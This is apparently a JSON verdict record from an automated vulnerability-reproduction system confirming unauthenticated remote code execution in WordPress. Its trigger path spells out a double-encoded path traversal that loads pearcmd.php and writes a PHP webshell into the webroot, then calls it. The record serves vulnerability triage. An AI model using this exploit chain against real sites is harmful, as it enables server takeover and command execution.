{
  "_pruva_terminal_reconciliation": {
    "authored_artifact_closure_sha256": "93c3f99e3ee7c86957f8f664f2e5ede17e189e2ebe1909d3fd9161585d2ef050",
    "authored_runtime_manifest_sha256": "2ba19a01d8bb9ac36e629611279679f927bce3e071597c7e932929319253696b",
    "authored_verdict_sha256": "03fb0e6b50f3120fa1356fac36993a28df1c3c398b69f5989e3689ae97f03536",
    "claim_matching": "evaluated",
    "schema_version": 2,
    "status": "completed"
  },
  "accepted_exploit_knowledge_record_ids": [
    "54120022-dad3-4b7d-aba4-671c93db46fa",
    "52c746f2-e88a-4d9c-8702-1410c31b4d65"
  ],
  "attacker_controlled_input": "Unauthenticated GET query vars: page_id (existing page) and double-url-encoded pagename traversal (templates%252f%252e%252e...%252fusr%252flocal%252flib%252fphp%252fpearcmd) plus pearcmd argv tokens (+config-create+<php>+<shell path>)",
  "claim_outcome": "confirmed",
  "claimed_impact_class": "code_execution",
  "claimed_surface": "api_remote",
  "crash_observed": false,
  "end_to_end_target_reached": true,
  "evidence_scope": "production_path",
  "exploit_chain_demonstrated": true,
  "exploitability_confidence": "high",
  "inferred": false,
  "observed_impact_class": "code_execution",
  "read_write_primitive_observed": true,
  "repro_result": "confirmed",
  "sanitizer_used": false,
  "trigger_path": "GET /?page_id=<id>&pagename=<double-encoded traversal>&+config-create+/<?=system(current($_GET))?>+/var/www/html/<shell>.php -> wp-includes/template.php get_page_template() -> locate_template() includes /usr/local/lib/php/pearcmd.php -> writes webroot webshell -> GET /<shell>.php executes attacker command",
  "validated_surface": "api_remote"
}
